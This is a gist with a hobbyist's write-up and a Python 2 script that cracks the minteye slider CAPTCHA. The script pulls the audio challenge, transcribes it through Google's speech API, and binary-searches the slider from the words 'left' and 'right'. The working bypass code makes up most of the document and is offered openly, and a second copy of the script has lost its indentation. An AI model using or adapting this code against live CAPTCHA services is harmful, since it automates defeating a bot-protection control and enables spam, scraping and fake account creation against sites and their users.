Samuirai/captcha_minteye.md

## captcha_minteye.md

      
    Raw
  

              captcha_minteye.md
            
          
    minteye is a captcha system where you try to find the original image out of distorted ones.
They also have a feature list on their website but they forgot the view from a computer. I fixed it:

There are two ways to crack this captcha easily. I've used the audio challange. There are three different kind of audio messages.

move the slider to the right
move the slider to the left
slider is in the correct position

1 and 2 are very long sentences and 3 is a very short sentence. I've used Google Chromes text2speech API to convert the audio into text. The text I get pack is totally stupid, but it recognizes "left" and "right" which is sufficient to determine the next move of the slider. Here is a small video which shows the code in action:
YouTube Video Demo
minteye should have a look at how reCaptcha obscures the audio. But the problem will always be the small amount of different messages.
kind regards,

samuirai
personal Website http://www.smrrd.de

I'm a member of the Stuttgart Hackerspace - shackspace
edit:
to see really cool stuff with reCaptcha, check out what they did: http://www.dc949.org/projects/stiltwalker/

  
## crack.py
import httplib, re, urllib2, json, subprocess, StringIO, Tkinter, ImageTk, traceback
from PIL import Image

tmp_folder = 'tmp/'
file_prefix = 'test_'

class Logger():
    def __init__(self,level=0):
        self.level = level

    def log(self,level=1,msg=''):
        if self.level>=level:
            print '[%d] %s' % (level,msg)

class MinteyeCaptcha:
    def __init__(self,CaptchaId='4025',PublicKey='8fce9e8a-dc61-4b04-b2a4-61e9ded571a2',Dummy='random_dummy',DEBUG=0):
        self.CaptchaId = CaptchaId
        self.PublicKey = PublicKey
        self.Dummy = Dummy
        self.logging = Logger(DEBUG)
        self.apiconn = httplib.HTTPConnection('api.minteye.com')
        self.logging.log(1,'created MintEye id: '+CaptchaId)
        self.SessionId = None
        self.cid = None

    def initiate(self):
        self.apiconn.request('GET','/Get.aspx?CaptchaId='+self.CaptchaId+'&PublicKey='+self.PublicKey+'&Dummy='+self.Dummy)
        req = self.apiconn.getresponse()

        content = req.read()
        self.cid = re.findall(r'.*Challenge: \'([a-z0-9\-]+)\',.*',content)[0]
        self.logging.log(1,'cid: '+self.cid)

        headers = req.getheaders()
        self.SessionId = re.findall(r'.*ASP.NET_SessionId=([a-z0-9]+);.*',dict(headers)['set-cookie'])[0]
        self.logging.log(1,'SessionId: '+self.SessionId)
        req.read()

        self.apiconn.request('GET','/Slider/SliderData.ashx?cid='+self.cid+'&CaptchaId='+self.CaptchaId+'&PublicKey='+self.PublicKey+'&w=300&h=250&callback=jQuery16208220419886056334_1355770229700&_=1355770230436')
        req = self.apiconn.getresponse()
        req.read()

        self.logging.log(1,'clear tmp dir')
        subprocess.call(['rm',tmp_folder+file_prefix+'*'])

    def getaudio(self,val=0):
        self.logging.log(1,'get audio: '+str(val))
        self.Dummy = '1234567'
        headers = 'Cookie: ASP.NET_SessionId='+self.SessionId
        self.apiconn.request('GET','/Slider/Speak.ashx?cid='+self.cid+'&val='+str(val)+'&dumm='+self.Dummy,headers)
        req = self.apiconn.getresponse()
        headers = req.getheaders()
        content = req.read()
        return content

    def getimg(self,val=0):
        self.logging.log(1,'get image: '+str(val))
        req = urllib2.urlopen('http://api.minteye.com/slider/image.ashx?CaptchaId=42&PublicKey='+self.PublicKey+'&w=300&h=250&dumm='+self.Dummy+'&reqid='+self.cid+'&img='+str(val))
        content = req.read()
        return content


    def audio2text(self,audio,val=0):
        try:
            self.logging.log(1,'create .wav file')
            f = open(tmp_folder+file_prefix+str(val)+'.wav','wb')
            f.write(audio)
            f.close()
            try:
                self.logging.log(1,'convert audio .wav to .flac')
                subprocess.call(["ffmpeg", "-i", tmp_folder+file_prefix+str(val)+'.wav', tmp_folder+file_prefix+str(val)+'.flac','-loglevel','quiet','-y'])
                f = open(tmp_folder+file_prefix+str(val)+'.flac','rb')
                audio = f.read()
                f.close()
                try:
                    self.logging.log(1,'audio2text via google')
                    url = "https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=en-US"
                    request = urllib2.Request(url)
                    request.add_header('Content-type','audio/x-flac; rate=8000')
                    request.add_header('Content-length', str(len(audio)))
                    request.add_data(audio)
                    response = urllib2.urlopen(request)
                    content = json.loads(response.read())
                    return content['hypotheses'][0]['utterance']
                except:
                    elf.logging.log(2,'ERROR: audio2text via google')
            except:
                self.logging.log(2,'ERROR: convert audio .wav to .flac')
        except:
            self.logging.log(2,'ERROR: create .wav file')
            traceback.print_exc()


cracker = MinteyeCaptcha(DEBUG=2)
cracker.initiate()
found = False
binary_search = [0,29]
root = Tkinter.Tk()
image, tkpi,label_image = None, None, None
label_image = Tkinter.Label(root)
label_image.pack()

def next_image(event):
    global binary_search, found, cracker, Tkinter, tkpi, label_image, root, image
    val = (binary_search[0]+(binary_search[1]-binary_search[0])/2)
    print "===== binary search try Image #%d (%d,%d) =====" % (val,binary_search[0],binary_search[1])

    root.title('Image #'+str(val))
    img = cracker.getimg(val)
    image = Image.open(StringIO.StringIO(img))
    root.geometry('%dx%d' % (image.size[0],image.size[1]))
    tkpi = ImageTk.PhotoImage(image)
    label_image.configure(image = tkpi)
    label_image.image = tkpi
    audio = cracker.getaudio(val)
    text = cracker.audio2text(audio)
    root.update()
    print "\nGoogle says:\n%s\n" % text
    if len(text)>50:
        if "left" in text[0:50]:
            binary_search[1] = val
        elif "right" in text[0:50]:
            binary_search[0] = val
        else:
            print "error?"
    else:
        print "\nFound valid Picture #"+str(val)
        found = True

root.geometry('+%d+%d' % (300,250))
root.bind("<space>", next_image)
root.mainloop()
	import httplib, re, urllib2, json, subprocess, StringIO, Tkinter, ImageTk, traceback
	from PIL import Image

	tmp_folder = 'tmp/'
	file_prefix = 'test_'

	class Logger():
	def __init__(self,level=0):
	self.level = level

	def log(self,level=1,msg=''):
	if self.level>=level:
	print '[%d] %s' % (level,msg)

	class MinteyeCaptcha:
	def __init__(self,CaptchaId='4025',PublicKey='8fce9e8a-dc61-4b04-b2a4-61e9ded571a2',Dummy='random_dummy',DEBUG=0):
	self.CaptchaId = CaptchaId
	self.PublicKey = PublicKey
	self.Dummy = Dummy
	self.logging = Logger(DEBUG)
	self.apiconn = httplib.HTTPConnection('api.minteye.com')
	self.logging.log(1,'created MintEye id: '+CaptchaId)
	self.SessionId = None
	self.cid = None

	def initiate(self):
	self.apiconn.request('GET','/Get.aspx?CaptchaId='+self.CaptchaId+'&PublicKey='+self.PublicKey+'&Dummy='+self.Dummy)
	req = self.apiconn.getresponse()

	content = req.read()
	self.cid = re.findall(r'.Challenge: \'([a-z0-9\-]+)\',.',content)[0]
	self.logging.log(1,'cid: '+self.cid)

	headers = req.getheaders()
	self.SessionId = re.findall(r'.ASP.NET_SessionId=([a-z0-9]+);.',dict(headers)['set-cookie'])[0]
	self.logging.log(1,'SessionId: '+self.SessionId)
	req.read()

	self.apiconn.request('GET','/Slider/SliderData.ashx?cid='+self.cid+'&CaptchaId='+self.CaptchaId+'&PublicKey='+self.PublicKey+'&w=300&h=250&callback=jQuery16208220419886056334_1355770229700&_=1355770230436')
	req = self.apiconn.getresponse()
	req.read()

	self.logging.log(1,'clear tmp dir')
	subprocess.call(['rm',tmp_folder+file_prefix+'*'])

	def getaudio(self,val=0):
	self.logging.log(1,'get audio: '+str(val))
	self.Dummy = '1234567'
	headers = 'Cookie: ASP.NET_SessionId='+self.SessionId
	self.apiconn.request('GET','/Slider/Speak.ashx?cid='+self.cid+'&val='+str(val)+'&dumm='+self.Dummy,headers)
	req = self.apiconn.getresponse()
	headers = req.getheaders()
	content = req.read()
	return content

	def getimg(self,val=0):
	self.logging.log(1,'get image: '+str(val))
	req = urllib2.urlopen('http://api.minteye.com/slider/image.ashx?CaptchaId=42&PublicKey='+self.PublicKey+'&w=300&h=250&dumm='+self.Dummy+'&reqid='+self.cid+'&img='+str(val))
	content = req.read()
	return content


	def audio2text(self,audio,val=0):
	try:
	self.logging.log(1,'create .wav file')
	f = open(tmp_folder+file_prefix+str(val)+'.wav','wb')
	f.write(audio)
	f.close()
	try:
	self.logging.log(1,'convert audio .wav to .flac')
	subprocess.call(["ffmpeg", "-i", tmp_folder+file_prefix+str(val)+'.wav', tmp_folder+file_prefix+str(val)+'.flac','-loglevel','quiet','-y'])
	f = open(tmp_folder+file_prefix+str(val)+'.flac','rb')
	audio = f.read()
	f.close()
	try:
	self.logging.log(1,'audio2text via google')
	url = "https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=en-US"
	request = urllib2.Request(url)
	request.add_header('Content-type','audio/x-flac; rate=8000')
	request.add_header('Content-length', str(len(audio)))
	request.add_data(audio)
	response = urllib2.urlopen(request)
	content = json.loads(response.read())
	return content['hypotheses'][0]['utterance']
	except:
	elf.logging.log(2,'ERROR: audio2text via google')
	except:
	self.logging.log(2,'ERROR: convert audio .wav to .flac')
	except:
	self.logging.log(2,'ERROR: create .wav file')
	traceback.print_exc()



	cracker = MinteyeCaptcha(DEBUG=2)
	cracker.initiate()
	found = False
	binary_search = [0,29]
	root = Tkinter.Tk()
	image, tkpi,label_image = None, None, None
	label_image = Tkinter.Label(root)
	label_image.pack()

	def next_image(event):
	global binary_search, found, cracker, Tkinter, tkpi, label_image, root, image
	val = (binary_search[0]+(binary_search[1]-binary_search[0])/2)
	print "===== binary search try Image #%d (%d,%d) =====" % (val,binary_search[0],binary_search[1])

	root.title('Image #'+str(val))
	img = cracker.getimg(val)
	image = Image.open(StringIO.StringIO(img))
	root.geometry('%dx%d' % (image.size[0],image.size[1]))
	tkpi = ImageTk.PhotoImage(image)
	label_image.configure(image = tkpi)
	label_image.image = tkpi
	audio = cracker.getaudio(val)
	text = cracker.audio2text(audio)
	root.update()
	print "\nGoogle says:\n%s\n" % text
	if len(text)>50:
	if "left" in text[0:50]:
	binary_search[1] = val
	elif "right" in text[0:50]:
	binary_search[0] = val
	else:
	print "error?"
	else:
	print "\nFound valid Picture #"+str(val)
	found = True

	root.geometry('+%d+%d' % (300,250))
	root.bind("<space>", next_image)
	root.mainloop()